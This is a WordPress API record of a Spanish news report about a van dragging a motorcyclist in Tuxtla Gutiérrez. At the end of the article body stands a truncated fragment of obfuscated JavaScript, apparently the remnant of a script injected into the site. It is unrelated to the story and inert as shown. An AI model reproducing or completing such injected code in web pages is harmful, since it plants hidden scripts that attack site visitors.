{"id":9421,"date":"2023-04-05T23:47:12","date_gmt":"2023-04-05T23:47:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9421"},"modified":"2023-04-05T23:47:12","modified_gmt":"2023-04-05T23:47:12","slug":"colectivo-arrastra-a-motociclista-en-el-barrio-san-francisco","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9421","title":{"rendered":"Colectivo arrastra a Motociclista en el Barrio San Francisco"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1680738363409.jpg\" alt=\"\" class=\"wp-image-9422\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1680738363409.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1680738363409-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 5 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles en el Barrio San Francisco se registr\u00f3 un choque, entre una motocicleta y un colectivo que cubre la ruta Copoya-Tuxtla y viceversa, dej\u00f3 un herido y da\u00f1os materiales.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, el colectivo circulaba en el carril de Poniente a Oriente sobre la 11 Sur y al llegar a la calle Central impact\u00f3 la moto que corr\u00eda en el sentido de Sur a Norte.<\/p>\n\n\n\n<p>El conductor de la Toyota Hiace arrastr\u00f3 al motociclista cerca de cinco metros.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil Municipal para atender al lesionado que present\u00f3 una fractura en la pierna izquierda, por lo que fue llevado a un nosocomio para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Los elementos de Tr\u00e1nsito tomaron fe de lo sucedido y el conductor de la Toyota as\u00ed como las unidades fueron presentados ante el MP para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 5 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles en el Barrio San Francisco se registr\u00f3 un choque, entre una motocicleta y un colectivo que cubre la ruta Copoya-Tuxtla y viceversa, dej\u00f3 un herido y da\u00f1os materiales. Los reportes de tr\u00e1nsito informaron que, el colectivo circulaba en el carril de Poniente &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9422,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9421","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9421","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9421"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9421\/revisions"}],"predecessor-version":[{"id":9423,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9421\/revisions\/9423"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9422"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9421"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9421"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9421"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}